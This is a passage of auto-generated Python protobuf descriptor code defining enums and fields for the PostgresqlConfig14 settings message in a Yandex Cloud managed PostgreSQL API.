_descriptor.EnumValueDescriptor(
name='BYTEA_OUTPUT_HEX', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BYTEA_OUTPUT_ESCAPED', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=11451,
serialized_end=11542,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_BYTEAOUTPUT)
_POSTGRESQLCONFIG14_XMLBINARY = _descriptor.EnumDescriptor(
name='XmlBinary',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.XmlBinary',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='XML_BINARY_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='XML_BINARY_BASE64', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='XML_BINARY_HEX', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=11544,
serialized_end=11626,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_XMLBINARY)
_POSTGRESQLCONFIG14_XMLOPTION = _descriptor.EnumDescriptor(
name='XmlOption',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.XmlOption',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='XML_OPTION_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='XML_OPTION_DOCUMENT', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='XML_OPTION_CONTENT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=11628,
serialized_end=11716,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_XMLOPTION)
_POSTGRESQLCONFIG14_BACKSLASHQUOTE = _descriptor.EnumDescriptor(
name='BackslashQuote',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.BackslashQuote',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE_ON', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE_OFF', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='BACKSLASH_QUOTE_SAFE_ENCODING', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=11719,
serialized_end=11873,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_BACKSLASHQUOTE)
_POSTGRESQLCONFIG14_PLANCACHEMODE = _descriptor.EnumDescriptor(
name='PlanCacheMode',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.PlanCacheMode',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='PLAN_CACHE_MODE_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PLAN_CACHE_MODE_AUTO', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PLAN_CACHE_MODE_FORCE_CUSTOM_PLAN', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PLAN_CACHE_MODE_FORCE_GENERIC_PLAN', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=11876,
serialized_end=12029,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_PLANCACHEMODE)
_POSTGRESQLCONFIG14_PGHINTPLANDEBUGPRINT = _descriptor.EnumDescriptor(
name='PgHintPlanDebugPrint',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.PgHintPlanDebugPrint',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='PG_HINT_PLAN_DEBUG_PRINT_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PG_HINT_PLAN_DEBUG_PRINT_OFF', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PG_HINT_PLAN_DEBUG_PRINT_ON', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PG_HINT_PLAN_DEBUG_PRINT_DETAILED', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='PG_HINT_PLAN_DEBUG_PRINT_VERBOSE', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=12032,
serialized_end=12240,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_PGHINTPLANDEBUGPRINT)
_POSTGRESQLCONFIG14_SHAREDPRELOADLIBRARIES = _descriptor.EnumDescriptor(
name='SharedPreloadLibraries',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.SharedPreloadLibraries',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='SHARED_PRELOAD_LIBRARIES_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SHARED_PRELOAD_LIBRARIES_AUTO_EXPLAIN', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SHARED_PRELOAD_LIBRARIES_PG_HINT_PLAN', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SHARED_PRELOAD_LIBRARIES_TIMESCALEDB', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SHARED_PRELOAD_LIBRARIES_PG_QUALSTATS', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=12243,
serialized_end=12480,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_SHAREDPRELOADLIBRARIES)
_POSTGRESQLCONFIG14 = _descriptor.Descriptor(
name='PostgresqlConfig14',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='max_connections', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_connections', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='shared_buffers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.shared_buffers', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='temp_buffers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.temp_buffers', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_prepared_transactions', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_prepared_transactions', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='work_mem', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.work_mem', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='maintenance_work_mem', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.maintenance_work_mem', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_work_mem', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_work_mem', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='temp_file_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.temp_file_limit', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_cost_delay', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_cost_delay', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_cost_page_hit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_cost_page_hit', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_cost_page_miss', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_cost_page_miss', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_cost_page_dirty', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_cost_page_dirty', index=11,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_cost_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_cost_limit', index=12,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bgwriter_delay', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.bgwriter_delay', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\01010-10000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bgwriter_lru_maxpages', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.bgwriter_lru_maxpages', index=14,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bgwriter_lru_multiplier', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.bgwriter_lru_multiplier', index=15,
number=16, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bgwriter_flush_after', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.bgwriter_flush_after', index=16,
number=17, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-2048', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backend_flush_after', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.backend_flush_after', index=17,
number=18, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-2048', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='old_snapshot_threshold', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.old_snapshot_threshold', index=18,
number=19, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\013-1-86400000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='wal_level', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.wal_level', index=19,
number=20, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='synchronous_commit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.synchronous_commit', index=20,
number=21, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='checkpoint_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.checkpoint_timeout', index=21,
number=22, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\01630000-86400000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='checkpoint_completion_target', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.checkpoint_completion_target', index=22,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='checkpoint_flush_after', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.checkpoint_flush_after', index=23,
number=24, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-2048', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_wal_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_wal_size', index=24,
number=25, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='min_wal_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.min_wal_size', index=25,
number=26, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_standby_streaming_delay', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_standby_streaming_delay', index=26,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_statistics_target', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.default_statistics_target', index=27,
number=28, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='constraint_exclusion', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.constraint_exclusion', index=28,
number=29, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cursor_tuple_fraction', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.cursor_tuple_fraction', index=29,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='from_collapse_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.from_collapse_limit', index=30,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0141-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='join_collapse_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.join_collapse_limit', index=31,
number=32, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0141-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='force_parallel_mode', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.force_parallel_mode', index=32,
number=33, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='client_min_messages', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.client_min_messages', index=33,
number=34, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_min_messages', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_min_messages', index=34,
number=35, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_min_error_statement', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_min_error_statement', index=35,
number=36, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_min_duration_statement', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_min_duration_statement', index=36,
number=37, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_checkpoints', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_checkpoints', index=37,
number=38, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_connections', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_connections', index=38,
number=39, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_disconnections', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_disconnections', index=39,
number=40, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_duration', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_duration', index=40,
number=41, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_error_verbosity', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_error_verbosity', index=41,
number=42, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_lock_waits', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_lock_waits', index=42,
number=43, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_statement', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_statement', index=43,
number=44, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_temp_files', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_temp_files', index=44,
number=45, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='search_path', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.search_path', index=45,
number=46, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='row_security', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.row_security', index=46,
number=47, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_transaction_isolation', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.default_transaction_isolation', index=47,
number=48, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='statement_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.statement_timeout', index=48,
number=49, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lock_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.lock_timeout', index=49,
number=50, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='idle_in_transaction_session_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.idle_in_transaction_session_timeout', index=50,
number=51, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bytea_output', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.bytea_output', index=51,
number=52, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='xmlbinary', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.xmlbinary', index=52,
number=53, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='xmloption', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.xmloption', index=53,
number=54, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gin_pending_list_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.gin_pending_list_limit', index=54,
number=55, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deadlock_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.deadlock_timeout', index=55,
number=56, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_locks_per_transaction', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_locks_per_transaction', index=56,
number=57, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_pred_locks_per_transaction', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_pred_locks_per_transaction', index=57,
number=58, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
